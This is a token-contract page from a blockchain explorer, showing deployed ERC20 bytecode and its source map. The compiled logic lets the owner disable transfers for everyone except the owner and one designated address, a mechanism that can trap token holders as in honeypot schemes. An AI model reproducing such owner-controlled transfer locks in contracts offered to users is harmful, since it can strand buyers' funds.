9003601f168201915b5050505050905090565b6000336103488185856105cb565b60019150505b92915050565b600654600090600160a01b900460ff1680610374575061037484846106ef565b6103995760405162461bcd60e51b815260040161039090610bf3565b60405180910390fd5b6103a4848484610766565b949350505050565b6000336103488185856103bf8383610505565b6103c99190610c50565b6105cb565b6103d661077f565b6103e060006107d9565b565b6060600480546102b790610bb9565b6103f961077f565b600680546001600160a01b0319166001600160a01b0392909216919091179055565b600033816104298286610505565b9050838110156104895760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610390565b61049682868684036105cb565b506001949350505050565b600654600090600160a01b900460ff16806104c157506104c133846106ef565b6104dd5760405162461bcd60e51b815260040161039090610bf3565b6104e7838361082b565b9392505050565b6104f661077f565b6006805460ff60a01b19169055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61053861077f565b6006805460ff60a01b1916600160a01b179055565b61055561077f565b6001600160a01b0381166105ba5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610390565b6105c3816107d9565b50565b505050565b6001600160a01b03831661062d5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610390565b6001600160a01b03821661068e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610390565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107036005546001600160a01b031690565b6001600160a01b0316836001600160a01b0316148061072f57506006546001600160a01b038481169116145b806104e757506005546001600160a01b0383811691161480156104e757506006546001600160a01b03848116911614905092915050565b600033610774858285610839565b6104968585856108b3565b6005546001600160a01b031633146103e05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6000336103488185856108b3565b60006108458484610505565b905060001981146108ad57818110156108a05760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610390565b6108ad84848484036105cb565b50505050565b6001600160a01b0383166109175760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610390565b6001600160a01b0382166109795760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610390565b610984838383610a62565b6001600160a01b038316600090815260208190526040902054818110156109fc5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610390565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108ad565b600654600160a01b900460ff1680610a7f5750610a7f83836106ef565b6105c65760405162461bcd60e51b815260040161039090610bf3565b600060208083528351808285015260005b81811015610ac857858101830151858201604001528201610aac565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0057600080fd5b919050565b60008060408385031215610b1857600080fd5b610b2183610ae9565b946020939093013593505050565b600080600060608486031215610b4457600080fd5b610b4d84610ae9565b9250610b5b60208501610ae9565b9150604084013590509250925092565b600060208284031215610b7d57600080fd5b6104e782610ae9565b60008060408385031215610b9957600080fd5b610ba283610ae9565b9150610bb060208401610ae9565b90509250929050565b600181811c90821680610bcd57607f821691505b602082108103610bed57634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526038908201527f546f6b656e207472616e7366657273206172652063757272656e746c7920646960408201527f7361626c656420666f72207468697320616464726573732e0000000000000000606082015260800190565b8082018082111561034e57634e487b7160e01b600052601160045260246000fdfea264697066735822122040ba7650f7cbc13f1c261c8b5171d206aba869111d79de7ec78b7f7f0db4b44064736f6c63430008120033

Deployed Bytecode Sourcemap

20420:1857:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9356:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11716:201;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;11716:201:0;1004:187:1;10485:108:0;10573:12;;10485:108;;;1342:25:1;;;1330:2;1315:18;10485:108:0;1196:177:1;21330:347:0;;;;;;:::i;:::-;;:::i;10327:93::-;;;10410:2;1853:36:1;;1841:2;1826:18;10327:93:0;1711:184:1;13167:238:0;;;;;;:::i;:::-;;:::i;20466:28::-;;;;;-1:-1:-1;;;;;20466:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;20466:28:0;1900:203:1;20501:27:0;;;;;-1:-1:-1;;;20501:27:0;;;;;;10656:127;;;;;;:::i;:::-;-1:-1:-1;;;;;10757:18:0;10730:7;10757:18;;;;;;;;;;;;10656:127;2811:103;;;:::i;:::-;;2170:87;2243:6;;-1:-1:-1;;;;;2243:6:0;2170:87;;9575:104;;;:::i;20875:120::-;;;;;;:::i;:::-;;:::i;13908:436::-;;;;;;:::i;:::-;;:::i;21003:319::-;;;;;;:::i;:::-;;:::i;20781:86::-;;;:::i;11245:151::-;;;;;;:::i;:::-;;:::i;20689:84::-;;;:::i;3069:201::-;;;;;;:::i;:::-;;:::i;9356:100::-;9410:13;9443:5;9436:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9356:100;:::o;11716:201::-;11799:4;801:10;11855:32;801:10;11871:7;11880:6;11855:8;:32::i;:::-;11905:4;11898:11;;;11716:201;;;;;:::o;21330:347::-;21467:15;;21428:4;;-1:-1:-1;;;21467:15:0;;;;;:55;;;21486:36;21504:6;21512:9;21486:17;:36::i;:::-;21445:161;;;;-1:-1:-1;;;21445:161:0;;;;;;;:::i;:::-;;;;;;;;;21624:45;21643:6;21651:9;21662:6;21624:18;:45::i;:::-;21617:52;21330:347;-1:-1:-1;;;;21330:347:0:o;13167:238::-;13255:4;801:10;13311:64;801:10;13327:7;13364:10;13336:25;801:10;13327:7;13336:9;:25::i;:::-;:38;;;;:::i;:::-;13311:8;:64::i;2811:103::-;2056:13;:11;:13::i;:::-;2876:30:::1;2903:1;2876:18;:30::i;:::-;2811:103::o:0;9575:104::-;9631:13;9664:7;9657:14;;;;;:::i;20875:120::-;2056:13;:11;:13::i;:::-;20955::::1;:32:::0;;-1:-1:-1;;;;;;20955:32:0::1;-1:-1:-1::0;;;;;20955:32:0;;;::::1;::::0;;;::::1;::::0;;20875:120::o;13908:436::-;14001:4;801:10;14001:4;14084:25;801:10;14101:7;14084:9;:25::i;:::-;14057:52;;14148:15;14128:16;:35;;14120:85;;;;-1:-1:-1;;;14120:85:0;;3803:2:1;14120:85:0;;;3785:21:1;3842:2;3822:18;;;3815:30;3881:34;3861:18;;;3854:62;-1:-1:-1;;;3932:18:1;;;3925:35;3977:19;;14120:85:0;3601:401:1;14120:85:0;14241:60;14250:5;14257:7;14285:15;14266:16;:34;14241:8;:60::i;:::-;-1:-1:-1;14332:4:0;;13908:436;-1:-1:-1;;;;13908:436:0:o;21003:319::-;21120:15;;21081:4;;-1:-1:-1;;;21120:15:0;;;;;:59;;;21139:40;21157:10;21169:9;21139:17;:40::i;:::-;21098:165;;;;-1:-1:-1;;;21098:165:0;;;;;;;:::i;:::-;21281:33;21296:9;21307:6;21281:14;:33::i;:::-;21274:40;21003:319;-1:-1:-1;;;21003:319:0:o;20781:86::-;2056:13;:11;:13::i;:::-;20836:15:::1;:23:::0;;-1:-1:-1;;;;20836:23:0::1;::::0;;20781:86::o;11245:151::-;-1:-1:-1;;;;;11361:18:0;;;11334:7;11361:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11245:151::o;20689:84::-;2056:13;:11;:13::i;:::-;20743:15:::1;:22:::0;;-1:-1:-1;;;;20743:22:0::1;-1:-1:-1::0;;;20743:22:0::1;::::0;;20689:84::o;3069:201::-;2056:13;:11;:13::i;:::-;-1:-1:-1;;;;;3158:22:0;::::1;3150:73;;;::::0;-1:-1:-1;;;3150:73:0;;4209:2:1;3150:73:0::1;::::0;::::1;4191:21:1::0;4248:2;4228:18;;;4221:30;4287:34;4267:18;;;4260:62;-1:-1:-1;;;4338:18:1;;;4331:36;4384:19;;3150:73:0::1;4007:402:1::0;3150:73:0::1;3234:28;3253:8;3234:18;:28::i;:::-;3069:201:::0;:::o;19557:91::-;;;;:::o;17901:346::-;-1:-1:-1;;;;;18003:19:0;;17995:68;;;;-1:-1:-1;;;17995:68:0;;4616:2:1;17995:68:0;;;4598:21:1;4655:2;4635:18;;;4628:30;4694:34;4674:18;;;4667:62;-1:-1:-1;;;4745:18:1;;;4738:34;4789:19;;17995:68:0;4414:400:1;17995:68:0;-1:-1:-1;;;;;18082:21:0;;18074:68;;;;-1:-1:-1;;;18074:68:0;;5021:2:1;18074:68:0;;;5003:21:1;5060:2;5040:18;;;5033:30;5099:34;5079:18;;;5072:62;-1:-1:-1;;;5150:18:1;;;5143:32;5192:19;;18074:68:0;4819:398:1;18074:68:0;-1:-1:-1;;;;;18155:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18207:32;;1342:25:1;;;18207:32:0;;1315:18:1;18207:32:0;;;;;;;17901:346;;;:::o;21685:265::-;21769:4;21818:7;2243:6;;-1:-1:-1;;;;;2243:6:0;;2170:87;21818:7;-1:-1:-1;;;;;21808:17:0;:6;-1:-1:-1;;;;;21808:17:0;;:57;;;-1:-1:-1;21852:13:0;;-1:-1:-1;;;;;21842:23:0;;;21852:13;;21842:23;21808:57;:123;;;-1:-1:-1;2243:6:0;;-1:-1:-1;;;;;21883:20:0;;;2243:6;;21883:20;:47;;;;-1:-1:-1;21917:13:0;;-1:-1:-1;;;;;21907:23:0;;;21917:13;;21907:23;21786:156;;21685:265;;;;:::o;12497:261::-;12594:4;801:10;12652:38;12668:4;801:10;12683:6;12652:15;:38::i;:::-;12701:27;12711:4;12717:2;12721:6;12701:9;:27::i;2335:132::-;2243:6;;-1:-1:-1;;;;;2243:6:0;801:10;2399:23;2391:68;;;;-1:-1:-1;;;2391:68:0;;5424:2:1;2391:68:0;;;5406:21:1;;;5443:18;;;5436:30;5502:34;5482:18;;;5475:62;5554:18;;2391:68:0;5222:356:1;3430:191:0;3523:6;;;-1:-1:-1;;;;;3540:17:0;;;-1:-1:-1;;;;;;3540:17:0;;;;;;;3573:40;;3523:6;;;3540:17;3523:6;;3573:40;;3504:16;;3573:40;3493:128;3430:191;:::o;10989:193::-;11068:4;801:10;11124:28;801:10;11141:2;11145:6;11124:9;:28::i;18538:419::-;18639:24;18666:25;18676:5;18683:7;18666:9;:25::i;:::-;18639:52;;-1:-1:-1;;18706:16:0;:37;18702:248;;18788:6;18768:16;:26;;18760:68;;;;-1:-1:-1;;;18760:68:0;;5785:2:1;18760:68:0;;;5767:21:1;5824:2;5804:18;;;5797:30;5863:31;5843:18;;;5836:59;5912:18;;18760:68:0;5583:353:1;18760:68:0;18872:51;18881:5;18888:7;18916:6;18897:16;:25;18872:8;:51::i;:::-;18628:329;18538:419;;;:::o;14814:806::-;-1:-1:-1;;;;;14911:18:0;;14903:68;;;;-1:-1:-1;;;14903:68:0;;6143:2:1;14903:68:0;;;6125:21:1;6182:2;6162:18;;;6155:30;6221:34;6201:18;;;6194:62;-1:-1:-1;;;6272:18:1;;;6265:35;6317:19;;14903:68:0;5941:401:1;14903:68:0;-1:-1:-1;;;;;14990:16:0;;14982:64;;;;-1:-1:-1;;;14982:64:0;;6549:2:1;14982:64:0;;;6531:21:1;6588:2;6568:18;;;6561:30;6627:34;6607:18;;;6600:62;-1:-1:-1;;;6678:18:1;;;6671:33;6721:19;;14982:64:0;6347:399:1;14982:64:0;15059:38;15080:4;15086:2;15090:6;15059:20;:38::i;:::-;-1:-1:-1;;;;;15132:15:0;;15110:19;15132:15;;;;;;;;;;;15166:21;;;;15158:72;;;;-1:-1:-1;;;15158:72:0;;6953:2:1;15158:72:0;;;6935:21:1;6992:2;6972:18;;;6965:30;7031:34;7011:18;;;7004:62;-1:-1:-1;;;7082:18:1;;;7075:36;7128:19;;15158:72:0;6751:402:1;15158:72:0;-1:-1:-1;;;;;15266:15:0;;;:9;:15;;;;;;;;;;;15284:20;;;15266:38;;15484:13;;;;;;;;;;:23;;;;;;15536:26;;1342:25:1;;;15484:13:0;;15536:26;;1315:18:1;15536:26:0;;;;;;;15575:37;19557:91;21958:316;22081:15;;-1:-1:-1;;;22081:15:0;;;;;:46;;;22100:27;22118:4;22124:2;22100:17;:27::i;:::-;22059:152;;;;-1:-1:-1;;;22059:152:0;;;;;;;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:420::-;3151:2;3133:21;;;3190:2;3170:18;;;3163:30;3229:34;3224:2;3209:18;;3202:62;3300:26;3295:2;3280:18;;3273:54;3359:3;3344:19;;2949:420::o;3374:222::-;3439:9;;;3460:10;;;3457:133;;;3512:10;3507:3;3503:20;3500:1;3493:31;3547:4;3544:1;3537:15;3575:4;3572:1;3565:15

Swarm Source

ipfs://40ba7650f7cbc13f1c261c8b5171d206aba869111d79de7ec78b7f7f0db4b440
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.